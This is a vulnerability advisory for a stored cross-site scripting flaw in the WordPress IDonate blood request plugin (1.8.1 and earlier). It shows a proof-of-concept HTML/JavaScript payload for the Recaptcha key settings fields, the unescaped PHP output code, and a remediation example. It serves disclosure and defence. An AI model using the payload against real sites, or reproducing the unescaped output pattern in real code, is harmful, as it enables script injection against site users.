WordPress IDonate Blood Request Management System 1.8.1 Cross Site Scripting
WordPress IDonate Blood Request Management System plugin versions 1.8.1 and below suffer from a persistent cross site scripting vulnerability.
# Exploit Title: IDonate – blood request management system <=1.8.1 - Stored Cross-Site Scripting (Authenticated)
# Date: 29-02-2024
# Exploit Author: Laburity Research Team
# Vendor Homepage: https://wordpress.org/plugins/idonate/
# Version: <=1.8.1
# Tested on: Firefox
# Contact me: contact [at] laburity.com

# Summary:

A stored cross-site scripting vulnerability has been identified in the WordPress plugin IDonate – blood request management system, version less than 1.8.1, that allows authenticated users to run arbitrary JavaScript code inside WordPress using the blood request management system plugin.

# POC

1- Navigate to http://localhost:10003/wp-admin/admin.php?page=idonate-setting-admin
2- Enter payload "><h1 onclick=alert(1)>XSS</h1> in Recaptcha secret key and in Recaptcha Site key
3- Click on save changes.
4- While clicking on the payload text, XSS will trigger.

# Vulnerable Code:

```
public function idonate_recaptcha_secretkey_callback() {
    // Read the stored option, defaulting to an empty string.
    if ( isset( $this->general_options['idonate_recaptcha_secretkey'] ) ) {
        $secretkey = $this->general_options['idonate_recaptcha_secretkey'];
    } else {
        $secretkey = '';
    }
    // Vulnerable: the stored value goes into the value attribute unescaped.
    printf( '<input type="text" id="idonate_recaptcha_secretkey" value="%s" name="idonate_general_option_name[idonate_recaptcha_secretkey]" />', $secretkey );
}
```

The secret key (idonate_recaptcha_secretkey) is printed without sanitization.
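
One way to close this hole, shown as an added example that is not the plugin's code or the vendor's patch: sanitize the option when it is saved and escape it for the attribute context when it is rendered. The function names `idonate_sanitize_general_options` and `idonate_render_secretkey_field` are hypothetical, and the two shims are rough stand-ins for the WordPress functions so the file also runs under php-cli.

```php
<?php
// Stand-ins used only when WordPress is not loaded (assumption: approximate
// behaviour, not the real implementations of these WordPress functions).
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $text ) {
        return trim( preg_replace( '/\s+/', ' ', strip_tags( (string) $text ) ) );
    }
}

// Input side (hypothetical helper): intended as the sanitize callback for the
// idonate_general_option_name option, so markup never reaches the database.
function idonate_sanitize_general_options( $input ) {
    $clean = array();
    foreach ( (array) $input as $key => $value ) {
        $clean[ $key ] = is_scalar( $value ) ? sanitize_text_field( $value ) : '';
    }
    return $clean;
}

// Output side (hypothetical helper): escape for the HTML attribute context,
// so a value that was stored before the fix still cannot break out of value="".
function idonate_render_secretkey_field( array $options ) {
    $secretkey = isset( $options['idonate_recaptcha_secretkey'] )
        ? $options['idonate_recaptcha_secretkey']
        : '';
    return sprintf(
        '<input type="text" id="idonate_recaptcha_secretkey" value="%s" name="idonate_general_option_name[idonate_recaptcha_secretkey]" />',
        esc_attr( $secretkey )
    );
}

// Constructed sample: the PoC value as it would sit in an unpatched database.
$stored = array( 'idonate_recaptcha_secretkey' => '"><h1 onclick=alert(1)>XSS</h1>' );

// Escaping alone: quotes and angle brackets become entities inside the attribute.
echo idonate_render_secretkey_field( $stored ), "\n";

// Sanitizing on save plus escaping on output: tags are stripped, the rest is escaped.
echo idonate_render_secretkey_field( idonate_sanitize_general_options( $stored ) ), "\n";
```

Escaping at output is the control that matters for values already stored; sanitizing on save only protects new writes.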